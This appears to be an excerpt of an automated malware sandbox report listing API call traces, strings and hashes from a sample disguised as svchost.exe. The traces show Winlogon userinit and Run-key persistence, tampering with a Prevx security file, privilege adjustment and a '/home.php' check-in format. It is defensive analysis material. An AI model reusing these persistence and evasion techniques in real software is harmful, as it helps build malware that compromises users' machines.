                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                              • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                              • API String ID: 33631002-3172865025
                                                                                                                                                                                                              • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 845 2c963f0-2c964b9 memset * 3 846 2c964c0-2c964ca 845->846 846->846 847 2c964cc-2c964e3 846->847 848 2c964f0-2c96518 strtol 847->848 848->848 849 2c9651a-2c96524 848->849 850 2c96530-2c9653e 849->850 850->850 851 2c96540 850->851 852 2c96542-2c96551 851->852 853 2c96553 852->853 854 2c96555-2c9655c 852->854 853->854 854->852 855 2c9655e-2c96593 call 2ca8160 strstr 854->855 858 2c9659e-2c965af strstr 855->858 859 2c96595-2c9659d 855->859 858->859 860 2c965b1-2c965c3 strtol 858->860 860->859 861 2c965c5-2c965cc 860->861 862 2c9662f-2c96647 GetProcessHeap RtlAllocateHeap 861->862 863 2c965ce-2c965de 861->863 864 2c96649-2c96682 memset * 2 _snprintf 862->864 865 2c96685-2c9668d 862->865 866 2c965e3-2c965f7 863->866 864->865 867 2c965f9-2c965fd 866->867 868 2c965fe 866->868 867->868 869 2c96600-2c96611 868->869 870 2c96613-2c96620 868->870 871 2c96624-2c9662d 869->871 870->871 871->862 872 2c965e0 871->872 872->866
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$strstrstrtol
                                                                                                                                                                                                              • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                              • API String ID: 600650289-3097137778
                                                                                                                                                                                                              • Opcode ID: 9f1eb89a37837300fa6eae9db08bf0dd2e19d5fb714d522c12137b67792f263d
                                                                                                                                                                                                              • Instruction ID: 8cb4705055a10203572eb02257d2321f88cbe0c68bd09fc5a9ab7f37b16f863a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f1eb89a37837300fa6eae9db08bf0dd2e19d5fb714d522c12137b67792f263d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E718C30E453445BDB21CB78DC84BDEBBBDAF48700F6045A8EA49E7281D3746755CB94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02CAA1CA
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02CAA1D7
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02CAA1F4
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00019E40,?,00000000,00000000), ref: 02CAA23E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAA256
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAA267
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 02CAA279
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02CAA291
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CAA2B1
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 02CAA327
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CAA334
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: %53%59%53%54%45%4D%21%38%31%38%32%32%35%21%43%31%42%34%45%39%44%34$/home.php$SystemDrive$name=%s&port=%u
                                                                                                                                                                                                              • API String ID: 1291007772-498123133
                                                                                                                                                                                                              • Opcode ID: 36e5f7a9fdad5e295a0b42130af4b7b3ed9377c74ae474d8062f2bc9b85ec24a
                                                                                                                                                                                                              • Instruction ID: 3123b901596a2247f6dc528b3b48bec08e7f41762b84947bbb0aef14a77a3d1c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36e5f7a9fdad5e295a0b42130af4b7b3ed9377c74ae474d8062f2bc9b85ec24a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1441D371A812197BEB24DBA0CC59FFA777DDB44705F404694F606E61C0EBF19A84CB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                              • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                              • API String ID: 606440919-2829233815
                                                                                                                                                                                                              • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02C93325
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C93344
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02C93351
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02C9336E
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C93389
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02C933A7
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02C933DE
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02C933FC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 02C9340A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SystemDrive, xrefs: 02C9333F
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 02C933D4
                                                                                                                                                                                                              • userinit, xrefs: 02C933F6
                                                                                                                                                                                                              • C:\Windows\apppatch\svchost.exe, xrefs: 02C933B4, 02C933EB
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 02C9339D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Open$AdminBackslashCloseEnvironmentInformationPathQueryUserValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3780845138-4271125494
                                                                                                                                                                                                              • Opcode ID: c20fb90e0af900f96571d84b47f9d43d3868e0ce602e161060fece7b11fc4f99
                                                                                                                                                                                                              • Instruction ID: 8a3988743a22e4b2dd93100374612712b298910e36b9c59e0a36235e09e221b8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c20fb90e0af900f96571d84b47f9d43d3868e0ce602e161060fece7b11fc4f99
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D213974A91208FBFB10CB90CC8AFEDB77CAB44B44F904598B705A6180D7F06654CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,74DEF380,00000000,00000000,?,?,02CA4E91,?,00000000), ref: 02C974C6
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C974E4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C9750D
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C97514
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C97527
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C97553
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C97563
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02C97572
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02C97585
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C97594
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C9759B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C975A8
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C975AF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C975CF
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 02C975E0
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004,74DEF380,00000000,00000000,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C975F0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$AllocateChangeCloseCreateFindFreeHandleInformationLockNotificationPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 213124939-0
                                                                                                                                                                                                              • Opcode ID: 552a467efd7f3119eba2df3de58229e447081b32aa4661a4e1dabda33925329c
                                                                                                                                                                                                              • Instruction ID: 28a89ee49c0e301bc322faf0da3d861fa86ce0e405087a911a86f3a9e645477f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 552a467efd7f3119eba2df3de58229e447081b32aa4661a4e1dabda33925329c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1841B6B1E52304BBDB209FA59C4CFAFBB6CEF84751F508619FA05E6180D7749618CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,74DEF380,00000000,00000000,?,00000000,00000000,?,00000000), ref: 02C9738D
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentThread.KERNEL32 ref: 02CB5940
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5947
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentProcess.KERNEL32(00000020,02CA4D1B,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5957
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB595E
                                                                                                                                                                                                                • Part of subcall function 02CB5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02CB5981
                                                                                                                                                                                                                • Part of subcall function 02CB5930: AdjustTokenPrivileges.KERNELBASE(02CA4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02CB599B
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetLastError.KERNEL32 ref: 02CB59A5
                                                                                                                                                                                                                • Part of subcall function 02CB5930: FindCloseChangeNotification.KERNEL32(02CA4D1B), ref: 02CB59B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02C973B4
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?), ref: 02C973D5
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02C973EE
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02C973F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000), ref: 02C9740C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C9741B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C9742D
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C9743D
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 02C9744A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C9746C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C9747D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorToken$CloseCurrentHandleOpenProcessThread$AdjustChangeConvertCreateErrorFindFreeInfoInformationLastLocalLockLookupNamedNotificationPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 2010133961-820036962
                                                                                                                                                                                                              • Opcode ID: b5671288c680860970033c13953db2e95e679484982dad006f9d5d4ee6cb70ab
                                                                                                                                                                                                              • Instruction ID: 78c4bd81f9788e5515b5f8f4e9d8e7b97b0bf8b65266cba9d84a2b35723494c7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5671288c680860970033c13953db2e95e679484982dad006f9d5d4ee6cb70ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC41D675A92208BBEB109F54DC49FEEBB6CEF85B95F508115FE04DA1C0D7709608CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                              • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • userinit, xrefs: 00402A38
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                              • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3547530944-2324515132
                                                                                                                                                                                                              • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                              • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateModule32SnapshotToolhelp32$ChangeCloseErrorFindFirstHandleInformationLastNextNotificationSwitchThreadmemset
                                                                                                                                                                                                              • String ID: .dll$kernel
                                                                                                                                                                                                              • API String ID: 1233480013-2375045364
                                                                                                                                                                                                              • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB56A6
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02CB56B7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB56C0
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 02CB56CF
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02CB56D8
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CB56F8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB5709
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,?), ref: 02CB572A
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kernel), ref: 02CB574C
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.dll), ref: 02CB5758
                                                                                                                                                                                                              • Module32Next.KERNEL32(00000000,00000224), ref: 02CB5766
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                              • String ID: .dll$kernel
                                                                                                                                                                                                              • API String ID: 2979424695-2375045364
                                                                                                                                                                                                              • Opcode ID: db1c0af3cb18abd3377bebfd1ec0b683ae825625c871ccd5fab2cc8c5bf99388
                                                                                                                                                                                                              • Instruction ID: 38bad47e70533411f1a643d868e0cf87a1a10a8e31787184bc3a1e6894b4c0f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db1c0af3cb18abd3377bebfd1ec0b683ae825625c871ccd5fab2cc8c5bf99388
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D21AB31B42114EBD7219AB9AC48FDE77ACEF893A5F940355E905E3180EB30DE4587A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96CA1
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96CBF
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02C96CDB
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,5DD2BAAFa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02C96D02
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C96D7A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C96D81
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96D95
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C96DAE
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02C96DBC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: 5DD2BAAFa$software\microsoft
                                                                                                                                                                                                              • API String ID: 217510255-2040404611
                                                                                                                                                                                                              • Opcode ID: 60332f409f1ee42d00cb78cd94cc3effdbcc594b4398df2229774b5170a52601
                                                                                                                                                                                                              • Instruction ID: 165cefc3dbf7873501a0f5838c451470dfb189a95793374e7e9a0c9b9d08e8e9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60332f409f1ee42d00cb78cd94cc3effdbcc594b4398df2229774b5170a52601
